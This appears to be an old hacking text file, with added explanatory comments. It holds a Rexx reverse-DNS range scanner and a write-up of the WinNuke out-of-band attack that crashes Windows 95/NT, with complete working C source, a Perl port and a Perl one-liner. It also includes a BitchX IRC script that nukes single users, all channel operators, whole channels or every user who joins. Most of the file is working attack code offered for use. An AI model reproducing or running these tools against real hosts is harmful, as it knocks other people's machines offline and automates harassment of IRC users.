
PROGRAM
TO SCAN HOST BY IP ADDRESS.......

/* [ http://www.rootshell.com/ ] - Maybe has a
use if you run OS/2? */
/* OS/2 Rexx-script ; scans hosts by IP-adresses */
/* Main flow: load the RexxUtil and rxsock packages, prompt for an address  */
/* range and an output file, then look up the host name of every address in */
/* the range and log the result to the console and the file.                */
/* No connect call appears in this listing; the only network call in the    */
/* loop is SockGetHostByAddr (presumably a resolver / reverse-DNS lookup,   */
/* so the activity would show up as sequential lookups for the range --     */
/* confirm against the rxsock documentation).                               */
/* crlf is assigned here but not referenced again in this listing. */
crlf='0d0a'x
The_End = 0
/* Register the loader functions of the RexxUtil and rxsock packages. */
call RxFuncAdd 'SysLoadFuncs', 'RexxUtil', 'SysLoadFuncs'
call RxFuncAdd 'SockLoadFuncs','rxsock','SockLoadFuncs'
/* On a HALT condition control transfers to CLEANUP, which closes the file. */
SIGNAL on HALT name CLEANUP
call SysLoadFuncs
call SockLoadFuncs
call SysCls
say ' '
rc = SockVersion()
say ''
say ' SockVersion='rc
/* The result of SockInit() is stored in rc but never checked. */
rc = SockInit()
say ' '
/* PULL uppercases the input; the trailing '.' discards everything after    */
/* the first word. None of the three answers is validated (the addresses    */
/* are not checked to be dotted quads, the file name is used as typed).     */
rc = Charout(,' Enter First IP: ')
pull First_IP .
say ' '
rc = Charout(,' Enter Last IP : ')
pull Last_IP .
say ' '
rc = Charout(,' Enter filename: ')
pull filename .
/* Empty answer: fall back to a default output file name. */
if filename = '' then filename = 'hostscan.dmp'
say ' '
say ' '
say ' scanning hostnames from 'First_IP 'to 'Last_IP '...'
say ' '
/* Write a banner to the output file. */
rc = lineout(filename, ' ')
/* NOTE(review): the next call is split across two lines; in Rexx a trailing */
/* comma is normally a continuation character, so the split may change how   */
/* the arguments are read -- presumably a page line-wrap, confirm against    */
/* the original script.                                                      */
rc = lineout(filename,
'**********************************************************************')
rc = lineout(filename, 'scan results for 'First_IP 'until 'Last_IP '...')
rc = lineout(filename, ' ')
/* Split both addresses into octets: D is the first octet, A the last. */
parse value First_IP with D1 '.' C1 '.'B1 '.'A1
parse value Last_IP with D2 '.' C2 '.'B2 '.'A2
do forever
/* Rebuild the current address from the four counters. */
First_IP = D1'.'C1'.'B1'.'A1
say ''
rc = charout(,First_IP' :')
rc = lineout(filename, ' ')
rc = charout(filename,First_IP' :')
/* Look up the host entry for the address; results land in the host.! stem. */
rc = SockGetHostByAddr(First_IP, 'host.!')
/* A return of 0 is treated as "lookup failed". */
if (rc = 0) then do
c = charout(,' ** Unable to resolve name ** ')
c = charout(filename,' ** Unable to resolve name ** ')
end
if rc <> 0 then do
rc = charout(,host.!name)
rc = charout(filename,host.!name)
/* Aliases are listed only when the count is greater than 1, so a host with */
/* exactly one alias has it omitted from the output.                        */
if host.!alias.0 > 1 then do bla = 1 to host.!alias.0
rc= charout(,' | 'host.!alias.bla)
rc= charout(filename,' | 'host.!alias.bla)
end /* do bla */
end
/* The_End is set by ipcounter once the counters equal the last address;    */
/* the check sits after the lookup so the last address is still processed.  */
If The_End = 1 then leave
call ipcounter
end /* do forever */
/* Skip over the ipcounter subroutine to the normal exit path. */
SIGNAL ENDE
/* ipcounter: advance the current address (D1.C1.B1.A1) by one, carrying    */
/* into the next octet at 256, and set The_End when the new address equals  */
/* the last address (D2.C2.B2.A2). Always returns 0.                        */
/* NOTE(review): the stop test is an exact match made after the increment,  */
/* so a range whose last address is not strictly after the first never sets */
/* The_End; D1 is also not bounded at 256. In that case the loop runs until */
/* it is halted.                                                            */
ipcounter:
A1 = A1 + 1
if A1 = 256 then do
A1 = 0
B1 = B1 + 1
end /* do */
if B1 = 256 then do
B1 = 0
C1 = C1 +1
end /* do */
if C1 = 256 then do
C1 = 0
D1 = D1 +1
end /* do */
/* All four octets must match the last address for the scan to finish. */
If D1 = D2 then do
If C1 = C2 then do
If B1 = B2 then do
If A1 = A2 then do
The_End = 1
end /* do */
nop
end /* do */
nop
end /* do */
nop
end /* do */
return 0
/* Begin Error-routines */
/* ENDE: normal exit path, reached through SIGNAL ENDE once the range is    */
/* done. Closes the output file and tells the user where the results are.   */
ENDE:
/* charout with only a stream name closes that stream. */
rc = charout(filename)
say ''
say ''
say ''
say ' Results are in 'filename
say ''
say ''
exit 0
/* CLEANUP: target of "SIGNAL on HALT"; runs when the script is interrupted. */
/* Closes the output file so the partial results are kept, then exits.       */
CLEANUP:
say 'CLEANUP'
rc = charout(filename)
say "Done !"
exit 0

SENDING OOB!

It is possible to remotely cause a denial of service against any Windows
95/NT user. It is done by sending OOB [Out Of Band] data over an
established connection you have with a Windows user. NetBIOS [139] seems
to be the most effective, since it is a part of Windows. Apparently
Windows doesn't know how to handle OOB, so it panics and crazy things
happen. I have heard reports of everything from Windows dropping carrier
to the entire screen turning white. Windows also sometimes has trouble
handling anything on a network at all after an attack like this. A
reboot fixes whatever damage this causes. Because the attack needs a
completed TCP connection to the listening port, filtering inbound port 139
from untrusted networks blocks it. Code follows.
--- CUT HERE ---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
/* Fixed destination port and file-scope state for the program. */
#define dport 139 /* Attack port: 139 is what we want */
/* s is the TCP socket used by main(); x is not referenced in this listing. */
int x, s;
/* Payload sent as out-of-band data; per the author its content is irrelevant. */
char *str = "Bye"; /* Makes no diff */
/* addr, spoofedaddr and host are declared but never used in this listing.   */
/* Despite the name "spoofedaddr", nothing here forges a source address: the */
/* program uses an ordinary connect(), so the peer address seen by the       */
/* target is the sender's real one.                                          */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
/*
 * open_sock - resolve `server` and connect the already-created TCP socket
 * `sock` to it on `port`.
 *
 * Returns -3 when the name cannot be resolved and -4 when connect() fails
 * (the socket is closed in that case). On success it prints a
 * "Connected to" line.
 *
 * NOTE(review): the success path ends in a bare `return;` although the
 * function is declared int, so the value seen by a caller is unspecified.
 * The only caller in this listing ignores the result anyway.
 */
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
/* First guess: treat `server` as a dotted-quad literal. */
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
/* If the name resolves, the resolved address overwrites the first guess. */
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
/* NOTE(review): s_addr is presumably an unsigned type on the tested    */
/* platforms, in which case this "< 0" test can never be true and the   */
/* -3 return is unreachable -- confirm.                                 */
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
/* Address length is hard-coded as 16 rather than sizeof(blah). */
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}
/*
 * main - takes exactly one argument (the target host), opens a TCP
 * connection to port dport (139) and sends the 3-byte string in `str` with
 * MSG_OOB, i.e. as TCP urgent data.
 *
 * What this looks like from the receiving side: a completed TCP handshake
 * to port 139 from the sender's real address, followed by one small segment
 * flagged urgent, then a close about 100 ms later.
 */
void main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
/* The return value of open_sock() is ignored, so the lines below run */
/* even when the connection was not established.                      */
open_sock(s,argv[1],dport);
printf("Sending crash... ");
/* MSG_OOB marks the payload as out-of-band (urgent) data; the result of */
/* send() is not checked.                                                */
send(s,str,strlen(str),MSG_OOB);
/* 100000 microseconds pause before the socket is closed. */
usleep(100000);
printf("Done!\n");
close(s);
}

#!/usr/bin/perl
# Ghent - [email protected] - Perl version of winnuke.c by _eci
# Perl port of the C program above: one TCP connection to the host named in
# the first argument, then a single send() flagged MSG_OOB (TCP urgent data).
# The connection is an ordinary connect(), so the peer address seen by the
# target is the sender's real one.
use strict; use Socket;
my($h,$p,$in_addr,$proto,$addr);
# $p is only ever assigned 139, and only when no second argument is given;
# a second argument is never copied into $p, so it would stay undefined.
$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
# A missing host only prints a message; there is no exit, so execution
# continues with an empty host name.
if (!$h) { print "A hostname must be provided. Ex:
www.microsoft.com\n"; }
# Element 4 of gethostbyname's list result is the first address; a failed
# lookup is not checked before it is packed into the socket address.
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
# After connecting, autoflush is switched on for the socket handle.
connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;
# The payload text is arbitrary; the result of send is not checked, so the
# final message is printed regardless of the outcome.
print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print
"Nuked!\n"; close S;

Here is winnuke in one line of perl5.004
# Same traffic as the longer listings: one TCP connection to port 139 and a
# single send() flagged MSG_OOB. The host name is the author's placeholder.
perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)'

------------wnuke15.irc---------------
# WinNuke BitchX IRC script/wnuke package v 1.5
# Created by maddog and lerper
# [email protected], [email protected]
# WinNuke IRCers with several options:
# the nick you define
# all of the ops in your current channel
# anyone who joins a channel
# everyone in the channel
# Creditz:
# goes out to _eci for winnuke
# #BitchX for their great support
# #ircII for pretending to be asleep whenever i asked for help
# #hack for the laughs (hey--they were talking about vibrators last night)
# Micro$oft for hosting the hacking channels on comic chat
# KL and his LPLC LAX
# shout outs to the L0pht and hey to members of "CdC"
# notice: this package was created so more people could learn about winnuke
# and more winblows users could patch themselves up.
# NOT so lame ircers could have their kicks
#Before using this script, compile the included winnuke.c
#cc -owinnuke winnuke.c should do the job!
#If you have a GNU compiler...replace the cc with gcc
#Then move the executable into your /usr/local/bin directory and
#chmod it with the access levels you wish.
# Load-time setup: banner prefixes and the loading message.
# wnuke_pgm is assigned here but not referenced elsewhere in this listing;
# the wnuke alias runs a program named "winnuke" directly.
assign wnuke_pgm wnuke
assign wn [wnuke w/ mass nuke features]
assign wi [winnuke commands]
eval echo $wn version 1.5 loading... [ by: maddog and the lerper ]
eval echo $wn type /whelp for commands
# /whelp: prints a one-line summary of each command the script defines.
# NOTE(review): the /awnuke help line is wrapped in this listing, leaving
# "with" and "mwnuke" as separate lines inside the alias body -- presumably
# a page line-wrap rather than part of the original script.
alias whelp {
eval echo $wi /wnuke <nick> - sends a win nuke to someone
eval echo $wi /mwnuke - sends a win nuke to everyone on a chan
eval echo $wi /awnuke - when someone joins, it nukes them too, effective
with
mwnuke
eval echo $wi /opwnuke - sends a win nuke to all ops
}
# /wnuke <nick>: issues a WHOIS for the nick, takes a field of the reply as
# the host, and runs the external "winnuke" program against it. Without an
# argument it prints the usage text.
# - A temporary hook on numeric 311 stores $3 of the reply in ndomain
#   (presumably the host field of the WHOIS reply -- confirm against the
#   client's numeric layout). Numeric 319 is hooked with an empty body. Both
#   hooks and the variable are removed again at the end.
# - NOTE(review): $ndomain is text supplied by the IRC server and is placed
#   unquoted on an exec command line that also carries a redirection and "&".
#   Anyone loading this script is handing network-supplied text to a local
#   command; treat that as untrusted input.
# - The program's output is discarded and it runs in the background, so the
#   "sent" message is printed whatever the outcome.
alias wnuke {
if ([$0]) {
^on ^311 "*" {^assign ndomain $3}
^on ^319 "*" #
^whois $0
wait
EVAL ^exec winnuke $1 $ndomain >/dev/null &
echo [wnuke] sent wnuke to $0 at $ndomain requested\.
^on 311 - "*"
^on 319 - "*"
^assign -ndomain
}
{
echo
echo Usage: /wnuke <nick>
}
}
# Wrappers that call /wnuke for many nicks at once.
# - The first join hook stores the joining nick in joinvar, which is not read
#   elsewhere in this listing.
# - awnuke installs a join hook for every channel ('*') that calls /wnuke on
#   each nick that joins.
# - mwnuke loops over $chanusers() and opwnuke over $chops(), calling /wnuke
#   once per nick.
# Every /wnuke call issues its own WHOIS, so on the server side these
# commands show up as a burst of WHOIS requests, one per channel member.
/on -join * {@joinvar=[$0]}
alias awnuke { /on -join * {/wnuke $0}}
alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }}
alias opwnuke { fe ($chops()) blah { /wnuke $blah }}
